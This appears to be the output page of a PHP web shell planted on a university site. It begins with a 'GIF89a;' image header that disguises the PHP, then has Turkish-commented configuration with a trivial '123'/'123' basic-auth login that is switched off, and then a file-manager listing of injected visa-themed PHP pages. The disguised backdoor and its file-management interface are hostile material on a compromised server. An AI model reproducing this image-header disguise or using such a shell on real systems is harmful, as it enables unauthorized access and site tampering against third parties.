GIF89a;
# Konfigurasyon
$sayfaSifreleme ='0'; # 1 acik , 0 kapali
$kullaniciAdi = '123';
$sifre = '123';
# yetki kontrol fonksiyonu
function yetkiKontrol($kullaniciAdi,$sifre) {
if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") {
header('WWW-Authenticate: Basic realm="x"');
die(header('HTTP/1.0 401 Unauthorized'));
}
}
# Sayfa Sifreleme aciksa
if($sayfaSifreleme =='1') {
# Veri ve sifre kontrolu
yetkiKontrol($kullaniciAdi,$sifre);
}
?>
eclass.unmer.ac.id
| Name |
Size |
Modified |
Perms |
Actions |
| Blog.php |
1.20 KB |
April 29 2025 13:39:14. |
0644 |
|
|
| CaToCpa.php |
185 bytes |
April 29 2025 13:39:14. |
0644 |
|
|
| Contact.php |
7.26 KB |
April 29 2025 13:39:14. |
0644 |
|
|
| ExpressEntryVisa.php |
219 bytes |
April 29 2025 13:39:14. |
0644 |
|
|
| FamilySponsorship.php |
344 bytes |
April 29 2025 13:39:14. |
0644 |
|
|
| Faq.php |
300 bytes |
April 29 2025 13:39:14. |
0644 |
|
|
| InvestmentProgrammePnpVisa.php |
245 bytes |
April 29 2025 13:39:14. |
0644 |
|
|
| Pnp.php |
176 bytes |
April 29 2025 13:39:14. |
0644 |
|
|
| StartUpVisa.php |
197 bytes |
April 29 2025 13:39:14. |
0644 |
|
|
| StudyPermitVisa.php |
209 bytes |
April 29 2025 13:39:14. |
0644 |
|
|